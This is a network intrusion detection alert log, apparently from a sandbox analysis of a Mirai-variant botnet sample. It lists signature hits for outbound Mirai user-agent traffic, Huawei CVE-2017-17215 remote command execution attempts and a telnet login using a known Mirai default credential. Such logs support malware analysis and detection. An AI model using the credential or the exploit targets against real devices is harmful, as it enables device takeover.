192.168.2.2395.100.231.9641116802839471 11/22/23-08:39:59.816783	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41116	80	192.168.2.23	95.100.231.96
192.168.2.2395.101.43.19039292802839471 11/22/23-08:40:04.893645	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39292	80	192.168.2.23	95.101.43.190
192.168.2.23112.126.147.16152326802839471 11/22/23-08:38:01.602639	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52326	80	192.168.2.23	112.126.147.161
192.168.2.2395.216.90.18451394802839471 11/22/23-08:38:40.877405	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51394	80	192.168.2.23	95.216.90.184
192.168.2.2341.42.81.18935538372152835222 11/22/23-08:40:01.779235	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	35538	37215	192.168.2.23	41.42.81.189
192.168.2.23112.124.101.12439986802839471 11/22/23-08:38:01.608499	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39986	80	192.168.2.23	112.124.101.124
192.168.2.2395.163.217.3534330802839471 11/22/23-08:39:49.905994	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34330	80	192.168.2.23	95.163.217.35
192.168.2.23197.56.131.17635542372152829579 11/22/23-08:39:23.590260	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	35542	37215	192.168.2.23	197.56.131.176
192.168.2.2395.101.169.11440020802839471 11/22/23-08:40:21.522377	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40020	80	192.168.2.23	95.101.169.114
192.168.2.23112.126.129.4736736802839471 11/22/23-08:39:12.817685	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36736	80	192.168.2.23	112.126.129.47
192.168.2.2395.101.181.7540926802839471 11/22/23-08:40:27.009412	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40926	80	192.168.2.23	95.101.181.75
192.168.2.2395.85.185.23446504802839471 11/22/23-08:40:01.183724	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46504	80	192.168.2.23	95.85.185.234
192.168.2.2395.46.201.14544216802839471 11/22/23-08:38:00.058354	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44216	80	192.168.2.23	95.46.201.145
192.168.2.2395.103.87.19148694802839471 11/22/23-08:38:35.843072	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48694	80	192.168.2.23	95.103.87.191
192.168.2.2395.216.33.13253504802839471 11/22/23-08:38:45.359840	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53504	80	192.168.2.23	95.216.33.132
192.168.2.23112.126.102.8245458802839471 11/22/23-08:39:20.641675	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45458	80	192.168.2.23	112.126.102.82
192.168.2.23197.220.7.24948948232023433 11/22/23-08:40:09.471073	TCP	2023433	ET TROJAN Possible Linux.Mirai Login Attempt (7ujMko0admin)	48948	23	192.168.2.23	197.220.7.249
192.168.2.2395.68.242.18257602802839471 11/22/23-08:38:24.791635	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57602	80	192.168.2.23	95.68.242.182
192.168.2.2388.99.149.20647606802839471 11/22/23-08:38:50.251015	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47606	80	192.168.2.23	88.99.149.206
192.168.2.2395.136.38.13644440802839471 11/22/23-08:38:19.602335	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44440	80	192.168.2.23	95.136.38.136
192.168.2.2395.101.107.9942448802839471 11/22/23-08:39:36.617945	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42448	80	192.168.2.23	95.101.107.99
192.168.2.2341.42.157.2449582372152835222 11/22/23-08:38:57.907901	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	49582	37215	192.168.2.23	41.42.157.24
192.168.2.2388.198.124.3443116802839471 11/22/23-08:39:57.726493	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43116	80	192.168.2.23	88.198.124.34
192.168.2.2395.164.252.13544286802839471 11/22/23-08:38:08.738280	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44286	80	192.168.2.23	95.164.252.135
192.168.2.2388.99.47.6741498802839471 11/22/23-08:38:35.245045	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41498	80	192.168.2.23	88.99.47.67
192.168.2.2395.100.139.7858060802839471 11/22/23-08:38:26.483600	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58060	80	192.168.2.23	95.100.139.78
192.168.2.2395.84.187.7745690802839471 11/22/23-08:38:42.845032	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45690	80	192.168.2.23	95.84.187.77
192.168.2.2388.80.21.342454802839471 11/22/23-08:38:50.255720	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42454	80	192.168.2.23	88.80.21.3
192.168.2.23112.48.136.10747028802839471 11/22/23-08:38:49.217606	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47028	80	192.168.2.23	112.48.136.107
192.168.2.23112.25.7.23532876802839471 11/22/23-08:39:18.858509	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32876	80	192.168.2.23	112.25.7.235
192.168.2.2395.100.139.7858486802839471 11/22/23-08:38:40.661519	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58486	80	192.168.2.23	95.100.139.78
192.168.2.23112.135.209.17343298802839471 11/22/23-08:38:46.231038	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43298	80	192.168.2.23	112.135.209.173
192.168.2.2395.100.51.24439498802839471 11/22/23-08:38:42.559239	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39498	80	192.168.2.23	95.100.51.244
192.168.2.2395.129.47.9851350802839471 11/22/23-08:39:25.898768	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51350	80	192.168.2.23	95.129.47.98
192.168.2.2395.130.253.24257004802839471 11/22/23-08:39:09.701276	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57004	80	192.168.2.23	95.130.253.242
192.168.2.2395.101.163.2936026802839471 11/22/23-08:38:28.297876	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36026	80	192.168.2.23	95.101.163.29
192.168.2.23112.65.217.6251346802839471 11/22/23-08:38:50.054587	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51346	80	192.168.2.23	112.65.217.62
192.168.2.2341.45.28.25546578372152829579 11/22/23-08:39:28.880184	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	46578	37215	192.168.2.23	41.45.28.255
192.168.2.23112.126.161.4233422802839471 11/22/23-08:39:13.449029	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33422	80	192.168.2.23	112.126.161.42
192.168.2.23112.126.197.17240328802839471 11/22/23-08:38:22.216698	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40328	80	192.168.2.23	112.126.197.172
192.168.2.2395.211.189.22038080802839471 11/22/23-08:38:53.086544	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38080	80	192.168.2.23	95.211.189.220
192.168.2.2395.101.188.15445096802839471 11/22/23-08:39:49.694898	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45096	80	192.168.2.23	95.101.188.154
192.168.2.2388.209.219.14950374802839471 11/22/23-08:38:39.291982	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50374	80	192.168.2.23	88.209.219.149
192.168.2.23112.47.32.21847328802839471 11/22/23-08:39:53.317709	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47328	80	192.168.2.23	112.47.32.218
192.168.2.23112.166.64.20041700802839471 11/22/23-08:38:01.589353	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41700	80	192.168.2.23	112.166.64.200
192.168.2.2388.213.226.13052570802839471 11/22/23-08:38:35.232101	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52570	80	192.168.2.23	88.213.226.130
192.168.2.2395.59.105.7949592802839471 11/22/23-08:38:42.892321	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49592	80	192.168.2.23	95.59.105.79
192.168.2.2395.100.227.3338088802839471 11/22/23-08:37:53.336291	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38088	80	192.168.2.23	95.100.227.33
192.168.2.23112.126.193.17934288802839471 11/22/23-08:39:42.878290	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34288	80	192.168.2.23	112.126.193.179
192.168.2.2388.65.133.20554074802839471 11/22/23-08:39:09.897420	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54074	80	192.168.2.23	88.65.133.205
192.168.2.2395.163.120.13240652802839471 11/22/23-08:39:46.072343	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40652	80	192.168.2.23	95.163.120.132
192.168.2.2395.101.251.13336640802839471 11/22/23-08:39:57.908451	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36640	80	192.168.2.23	95.101.251.133
192.168.2.2395.101.63.4457826802839471 11/22/23-08:39:59.804522	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57826	80	192.168.2.23	95.101.63.44
192.168.2.2395.179.134.3043288802839471 11/22/23-08:38:45.346629	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43288	80	192.168.2.23	95.179.134.30
192.168.2.2395.59.48.16447432802839471 11/22/23-08:38:54.187643	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47432	80	192.168.2.23	95.59.48.164
192.168.2.2395.65.52.12444510802839471 11/22/23-08:38:08.662602	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44510	80	192.168.2.23	95.65.52.124
192.168.2.2395.101.19.17552006802839471 11/22/23-08:38:35.817035	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52006	80	192.168.2.23	95.101.19.175
192.168.2.2388.221.177.3158406802839471 11/22/23-08:39:09.872132	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58406	80	192.168.2.23	88.221.177.31
192.168.2.2388.221.137.10345418802839471 11/22/23-08:40:09.950231	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45418	80	192.168.2.23	88.221.137.103
192.168.2.23112.46.50.15158890802839471 11/22/23-08:38:49.083361	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58890	80	192.168.2.23	112.46.50.151
192.168.2.23112.126.172.7545408802839471 11/22/23-08:38:16.035262	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45408	80	192.168.2.23	112.126.172.75
192.168.2.2395.83.109.24436238802839471 11/22/23-08:38:32.462169	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36238	80	192.168.2.23	95.83.109.244
192.168.2.2395.163.51.10641664802839471 11/22/23-08:38:26.684766	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41664	80	192.168.2.23	95.163.51.106
192.168.2.23112.175.62.20544668802839471 11/22/23-08:39:47.807549	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44668	80	192.168.2.23	112.175.62.205
192.168.2.2395.85.185.23446392802839471 11/22/23-08:39:58.122027	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46392	80	192.168.2.23	95.85.185.234
192.168.2.2395.100.59.21133654802839471 11/22/23-08:38:30.021454	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33654	80	192.168.2.23	95.100.59.211
192.168.2.23112.74.177.7733658802839471 11/22/23-08:38:11.401817	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33658	80	192.168.2.23	112.74.177.77
192.168.2.23112.34.113.18350564802839471 11/22/23-08:39:23.351224	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50564	80	192.168.2.23	112.34.113.183
192.168.2.2395.216.96.25041616802839471 11/22/23-08:37:53.338996	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41616	80	192.168.2.23	95.216.96.250
192.168.2.23112.175.196.21141722802839471 11/22/23-08:39:25.671508	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41722	80	192.168.2.23	112.175.196.211
192.168.2.2395.100.184.18252248802839471 11/22/23-08:40:18.403616	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52248	80	192.168.2.23	95.100.184.182
192.168.2.23112.126.230.3159976802839471 11/22/23-08:38:11.393985	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59976	80	192.168.2.23	112.126.230.31
192.168.2.2395.100.66.16360906802839471 11/22/23-08:38:32.414787	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60906	80	192.168.2.23	95.100.66.163
192.168.2.2395.183.54.1755486802839471 11/22/23-08:38:56.649101	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55486	80	192.168.2.23	95.183.54.17
192.168.2.2395.100.241.5937688802839471 11/22/23-08:38:35.620780	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37688	80	192.168.2.23	95.100.241.59
192.168.2.2388.217.85.7855388802839471 11/22/23-08:39:06.806153	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55388	80	192.168.2.23	88.217.85.78
192.168.2.2395.56.77.6656916802839471 11/22/23-08:38:32.495163	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56916	80	192.168.2.23	95.56.77.66
192.168.2.2388.150.241.14844606802839471 11/22/23-08:40:18.230585	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44606	80	192.168.2.23	88.150.241.148
192.168.2.23112.16.224.12052030802839471 11/22/23-08:39:12.500240	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52030	80	192.168.2.23	112.16.224.120
192.168.2.23112.171.17.7551406802839471 11/22/23-08:39:40.648799	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51406	80	192.168.2.23	112.171.17.75
192.168.2.2395.153.139.25337318802839471 11/22/23-08:40:25.568099	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37318	80	192.168.2.23	95.153.139.253
192.168.2.2388.221.225.15957770802839471 11/22/23-08:38:32.852134	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57770	80	192.168.2.23	88.221.225.159
192.168.2.2395.101.249.12438914802839471 11/22/23-08:39:12.833749	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38914	80	192.168.2.23	95.101.249.124
192.168.2.23112.185.179.12252430802839471 11/22/23-08:39:01.734140	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52430	80	192.168.2.23	112.185.179.122
192.168.2.2388.214.140.12337768802839471 11/22/23-08:40:18.538619	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37768	80	192.168.2.23	88.214.140.123
192.168.2.23112.26.238.5538506802839471 11/22/23-08:38:01.647047	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38506	80	192.168.2.23	112.26.238.55
192.168.2.2388.255.41.1748840802839471 11/22/23-08:40:06.977799	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48840	80	192.168.2.23	88.255.41.17
192.168.2.2395.101.98.1335072802839471 11/22/23-08:40:04.698847	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35072	80	192.168.2.23	95.101.98.13
192.168.2.2341.239.75.24534908372152835222 11/22/23-08:39:28.883760	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	34908	37215	192.168.2.23	41.239.75.245
192.168.2.23112.74.160.23854630802839471 11/22/23-08:39:45.586334	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54630	80	192.168.2.23	112.74.160.238
192.168.2.2388.221.170.13458396802839471 11/22/23-08:39:48.014514	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58396	80	192.168.2.23	88.221.170.134
192.168.2.2395.130.254.1549734802839471 11/22/23-08:39:54.664720	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49734	80	192.168.2.23	95.130.254.15
192.168.2.23112.16.229.3950954802839471 11/22/23-08:40:15.759922	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50954	80	192.168.2.23	112.16.229.39
192.168.2.2388.255.52.18036956802839471 11/22/23-08:38:50.284516	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36956	80	192.168.2.23	88.255.52.180
192.168.2.2395.101.1.7658872802839471 11/22/23-08:38:58.769211	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58872	80	192.168.2.23	95.101.1.76
192.168.2.23112.217.155.8251538802839471 11/22/23-08:39:39.354255	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51538	80	192.168.2.23	112.217.155.82
192.168.2.2395.246.80.20943790802839471 11/22/23-08:38:08.669109	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43790	80	192.168.2.23	95.246.80.209
192.168.2.2341.34.202.18946134372152835222 11/22/23-08:38:13.131600	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	46134	37215	192.168.2.23	41.34.202.189
192.168.2.2388.224.58.5943332802839471 11/22/23-08:38:32.735193	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43332	80	192.168.2.23	88.224.58.59
192.168.2.23112.28.221.21259218802839471 11/22/23-08:38:48.609657	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59218	80	192.168.2.23	112.28.221.212
192.168.2.2395.85.185.23446652802839471 11/22/23-08:40:05.270962	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46652	80	192.168.2.23	95.85.185.234
192.168.2.2395.56.16.11933560802839471 11/22/23-08:38:42.639472	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33560	80	192.168.2.23	95.56.16.119
192.168.2.2395.179.141.340736802839471 11/22/23-08:38:32.414156	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	40736	80	192.168.2.23	95.179.141.3
192.168.2.2395.33.49.14734374802839471 11/22/23-08:38:35.834742	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34374	80	192.168.2.23	95.33.49.147
192.168.2.2395.100.142.7350046802839471 11/22/23-08:40:04.698948	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50046	80	192.168.2.23	95.100.142.73
192.168.2.2395.100.116.7335332802839471 11/22/23-08:38:00.057084	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35332	80	192.168.2.23	95.100.116.73
192.168.2.23112.126.223.16536602802839471 11/22/23-08:38:20.062657	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36602	80	192.168.2.23	112.126.223.165
192.168.2.2388.221.178.17954260802839471 11/22/23-08:39:14.666559	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54260	80	192.168.2.23	88.221.178.179
192.168.2.2341.239.72.25041458372152835222 11/22/23-08:39:02.196658	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	41458	37215	192.168.2.23	41.239.72.250
192.168.2.2388.99.239.1847008802839471 11/22/23-08:39:47.996303	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47008	80	192.168.2.23	88.99.239.18
192.168.2.2395.179.180.9648130802839471 11/22/23-08:38:42.735862	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48130	80	192.168.2.23	95.179.180.96
192.168.2.2388.113.24.15752526802839471 11/22/23-08:38:21.696320	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52526	80	192.168.2.23	88.113.24.157
192.168.2.2388.221.11.13060746802839471 11/22/23-08:39:32.813745	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60746	80	192.168.2.23	88.221.11.130
192.168.2.23112.29.195.4357014802839471 11/22/23-08:39:45.597439	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57014	80	192.168.2.23	112.29.195.43
192.168.2.2395.168.209.7748870802839471 11/22/23-08:38:08.637756	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48870	80	192.168.2.23	95.168.209.77
192.168.2.2395.100.34.11846994802839471 11/22/23-08:40:28.926790	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46994	80	192.168.2.23	95.100.34.118
192.168.2.2395.181.228.4735672802839471 11/22/23-08:38:58.229442	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35672	80	192.168.2.23	95.181.228.47
192.168.2.2388.85.64.14157204802839471 11/22/23-08:40:14.083509	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	57204	80	192.168.2.23	88.85.64.141
192.168.2.23197.0.96.19741388372152835222 11/22/23-08:40:28.467238	TCP	2835222	ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)	41388	37215	192.168.2.23	197.0.96.197
192.168.2.2395.230.223.20439336802839471 11/22/23-08:39:59.837286	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39336	80	192.168.2.23	95.230.223.204
192.168.2.23112.125.171.17637140802839471 11/22/23-08:38:11.377537	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37140	80	192.168.2.23	112.125.171.176
192.168.2.2388.221.241.23536508802839471 11/22/23-08:38:03.697867	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36508	80	192.168.2.23	88.221.241.235
192.168.2.2395.100.207.3133586802839471 11/22/23-08:39:13.994518	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33586	80	192.168.2.23	95.100.207.31
192.168.2.2388.204.255.10151840802839471 11/22/23-08:38:26.546053	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51840	80	192.168.2.23	88.204.255.101
192.168.2.23112.126.240.20958622802839471 11/22/23-08:38:15.728901	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58622	80	192.168.2.23	112.126.240.209
192.168.2.23112.196.31.7359800802839471 11/22/23-08:39:01.480282	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59800	80	192.168.2.23	112.196.31.73
192.168.2.23197.56.98.19551374372152829579 11/22/23-08:38:35.550535	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	51374	37215	192.168.2.23	197.56.98.195
192.168.2.2395.98.55.243850802839471 11/22/23-08:39:49.886820	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43850	80	192.168.2.23	95.98.55.2
192.168.2.23112.16.247.13043826802839471 11/22/23-08:38:12.085098	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43826	80	192.168.2.23	112.16.247.130
192.168.2.2388.156.111.5546362802839471 11/22/23-08:38:53.498160	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46362	80	192.168.2.23	88.156.111.55
192.168.2.23112.125.187.16253684802839471 11/22/23-08:40:30.507238	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53684	80	192.168.2.23	112.125.187.162
192.168.2.2395.211.226.14233318802839471 11/22/23-08:39:54.848290	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33318	80	192.168.2.23	95.211.226.142
192.168.2.2395.216.200.12050650802839471 11/22/23-08:39:58.102835	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50650	80	192.168.2.23	95.216.200.120
192.168.2.2388.99.127.5848550802839471 11/22/23-08:39:32.796794	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48550	80	192.168.2.23	88.99.127.58
192.168.2.2395.110.155.1341556802839471 11/22/23-08:39:54.934206	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41556	80	192.168.2.23	95.110.155.13
192.168.2.2395.57.70.25341702802839471 11/22/23-08:39:45.857496	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41702	80	192.168.2.23	95.57.70.253
192.168.2.23112.135.199.4434690802839471 11/22/23-08:38:20.165353	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34690	80	192.168.2.23	112.135.199.44
192.168.2.23112.125.218.1453734802839471 11/22/23-08:38:18.062883	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53734	80	192.168.2.23	112.125.218.14
192.168.2.23112.165.91.22554606802839471 11/22/23-08:39:16.528057	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54606	80	192.168.2.23	112.165.91.225
192.168.2.2395.28.230.1333104802839471 11/22/23-08:40:27.014146	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	33104	80	192.168.2.23	95.28.230.13
192.168.2.2388.81.88.14058040802839471 11/22/23-08:40:01.855251	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	58040	80	192.168.2.23	88.81.88.140
192.168.2.23112.126.228.24841274802839471 11/22/23-08:39:42.876549	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41274	80	192.168.2.23	112.126.228.248
192.168.2.2388.88.233.10835642802839471 11/22/23-08:39:36.812078	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35642	80	192.168.2.23	88.88.233.108
192.168.2.2395.110.132.24348460802839471 11/22/23-08:37:50.619830	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48460	80	192.168.2.23	95.110.132.243
192.168.2.2395.101.50.1638666802839471 11/22/23-08:39:23.581584	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38666	80	192.168.2.23	95.101.50.16
192.168.2.2395.100.234.9835880802839471 11/22/23-08:38:56.649256	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35880	80	192.168.2.23	95.100.234.98
192.168.2.2395.161.196.17035598802839471 11/22/23-08:37:53.143313	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35598	80	192.168.2.23	95.161.196.170
192.168.2.2395.100.150.4647912802839471 11/22/23-08:39:25.180254	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	47912	80	192.168.2.23	95.100.150.46
192.168.2.2395.85.185.23446426802839471 11/22/23-08:39:59.409615	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46426	80	192.168.2.23	95.85.185.234
192.168.2.2341.42.152.14033446372152829579 11/22/23-08:40:09.100084	TCP	2829579	ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)	33446	37215	192.168.2.23	41.42.152.140
192.168.2.23112.121.162.2248390802839471 11/22/23-08:39:23.287925	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	48390	80	192.168.2.23	112.121.162.22
192.168.2.2388.221.138.14535592802839471 11/22/23-08:39:18.935087	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35592	80	192.168.2.23	88.221.138.145
192.168.2.2388.221.192.4853890802839471 11/22/23-08:38:15.210866	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53890	80	192.168.2.23	88.221.192.48
192.168.2.2395.59.110.21342638802839471 11/22/23-08:38:41.087288	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42638	80	192.168.2.23	95.59.110.213
192.168.2.2395.100.190.2934720802839471 11/22/23-08:38:08.863832	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	34720	80	192.168.2.23	95.100.190.29
192.168.2.2388.198.130.8835954802839471 11/22/23-08:38:38.655456	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35954	80	192.168.2.23	88.198.130.88
192.168.2.2395.57.104.20036412802839471 11/22/23-08:39:59.188286	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	36412	80	192.168.2.23	95.57.104.200
192.168.2.2388.3.95.15232788802839471 11/22/23-08:38:50.250924	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	32788	80	192.168.2.23	88.3.95.152
192.168.2.2395.174.100.19246132802839471 11/22/23-08:39:06.570944	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46132	80	192.168.2.23	95.174.100.192
